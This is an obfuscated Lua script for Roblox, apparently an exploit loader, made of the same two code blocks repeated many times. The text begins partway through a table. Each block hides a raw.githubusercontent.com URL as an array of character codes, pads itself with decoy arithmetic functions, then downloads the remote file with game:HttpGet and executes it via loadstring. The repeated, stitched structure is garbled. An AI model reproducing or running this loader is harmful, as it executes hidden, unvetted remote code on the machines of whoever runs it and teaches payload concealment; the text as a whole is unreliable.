    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"
